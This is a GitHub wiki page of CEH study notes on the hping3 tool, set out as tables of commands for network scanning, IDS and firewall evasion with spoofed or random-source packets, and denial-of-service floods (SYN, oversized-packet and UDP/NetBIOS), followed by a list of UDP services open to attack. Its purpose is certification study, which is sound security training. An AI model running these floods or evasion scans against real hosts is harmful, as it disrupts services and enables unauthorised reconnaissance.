CEH_hping3 - yenbohuang/techNotes GitHub Wiki
hping3: https://www.kali.org/tools/hping3/
Scanning Networks
| Command |
Note |
hping3 -A 10.10.1.22 -p 80 -c 5 |
ACK scan (check open port) |
hping3 -8 0-100 -S 10.10.1.22 -V |
SYN scan (find port + service) |
hping3 -F -P -U 10.10.1.22 -p 80 -c 5 |
FIN, PUSH, and URG scan (check open port) |
hping3 --scan 0-100 -S 10.10.1.22 |
TCP stealth scan (find port + service) |
hping3 -1 10.10.1.22 -p 80 -c 5 |
ICMP ping scan (check open port) |
hping3 -1 10.10.1.0/24 --rand-dest -I eth0 |
Entire subnet scan for live host |
hping3 -2 10.10.1.22 -p 80 -c 5 |
UDP scan |
Create Custom UDP and TCP Packets to Evade the IDS/Firewall
| Command |
Note |
hping3 10.10.1.11 --udp --rand-source --data 500 |
Send UDP packets with random source mode and fixed packet body size. |
hping3 -S 10.10.1.11 -p 80 -c 5 |
Send TCP SYN request. |
hping3 10.10.1.11 --flood |
Performs TCP flooding. |
Denial-of-Service
Perform a DoS Attack on a Target Host using hping3
| Command |
Note |
hping3 -S <Target IP Address> -a <Spoofable IP Address> -p 22 --flood |
Floods the victim machine by sending bulk SYN packets and overloading the victim’s resources. |
hping3 -d 65538 -S -p 21 --flood <Target IP Address> |
The attacker sends a packet that has a size of 65,538 bytes to the target web server. This packet size exceeds the size limit prescribed by RFC 791 IP, which is 65,535 bytes. The receiving system’s reassembly process might cause the system to crash. |
hping3 -2 -p 139 --flood <Target IP Address> |
Used NetBIOS port 139 to perform a UDP application layer flood attack. |
UDP ports can be attacked:
| Service |
Port Number |
| CharGEN |
19 |
| SNMPv2 |
161 |
| QOTD |
17 |
| RPC |
135 |
| SSDP |
1900 |
| CLDAP |
389 |
| TFTP |
69 |
| NetBIOS |
137,138,139 |
| NTP |
123 |
| Quake Network Protocol |
26000 |
| VoIP |
5060 |